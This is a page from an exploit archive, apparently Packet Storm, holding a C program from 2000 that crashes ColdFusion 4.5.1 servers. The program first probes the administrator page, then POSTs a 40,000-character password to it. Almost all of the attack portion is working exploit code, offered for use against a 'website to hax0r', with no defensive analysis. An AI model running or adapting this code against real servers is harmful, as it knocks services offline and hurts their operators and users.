exploit the possibilities

yl-cfDoS.c

yl-cfDoS.c
Posted Jun 13, 2000
Authored by Ytcracker

Cold Fusion 4.5.1 remote dos attack - sends a very long password, crashing the server.

tags | exploit, remote, denial of service
MD5 | c874ae7e28967ded6ba2e85b90b942a6

yl-cfDoS.c

Change Mirror Download
/* [yl-cfDoS.c]

title: [cold fusion 4.5.1 ereeu DoS attack]
date: 06.11.2000
author: ytcracker[phed@felons.org]
comments: allaire[www.allaire.com]'s cold fusion webserver seemingly
has an odd little bug in it where it suffers from a denial
of service attack when the administrator panel is accessed
using a character post of greater than 4o,ooo characters.

if your password is 4o,ooo or more characters, i suggest
that you change your password immediately.

usage: ./yl-cfDoS [website to hax0r]
shouts: seven one nine. master p and the no limit army. geese.
credit: foundstone for the buqtraq advisory.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/param.h>

int main(int argc, char **argv)
{
int sock;
unsigned long vulnip;

struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;

char *detect;
char buffer[1024];
char cfhack[]="POST /cfide/administrator/index.cfm HTTP/1.0\n\nReferer: http://www.csanetworks.com\nUser-Agent: ytCracker vo.1 (ytCLinux 5.o)\n";
char cfchars[40001];
char cfdos[40050];

printf("\n [cf 4.5.1 DoS] [ytcracker] [phed@felons.org]\n");

if(argc<2)
{
printf(" usage: %s [vulnerable website]\n\n",argv[0]);
exit(0);
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}

vulnip=inet_addr(argv[1]);
vulnip=ntohl(vulnip);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}

send(sock, cfhack,strlen(cfhack),0);
recv(sock, buffer, sizeof(buffer),0);
detect = strstr(buffer,"404");
close(sock);

if( detect != NULL)
{
printf(" vulnerabilty not detected.\n\n");
exit(0);
}
else
printf(" vulnerability detected.\n");

printf(" sending crash data.\n");

memset(cfchars,89,sizeof(cfchars));
sprintf(cfdos,"%s\nPasswordProvided=%s\n\n\n",cfhack,cfchars);

vulnip=inet_addr(argv[1]);
vulnip=ntohl(vulnip);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}

send(sock,cfdos,strlen(cfdos),0);
close(sock);

printf(" data sent!\n\n");
return 0;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    2 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close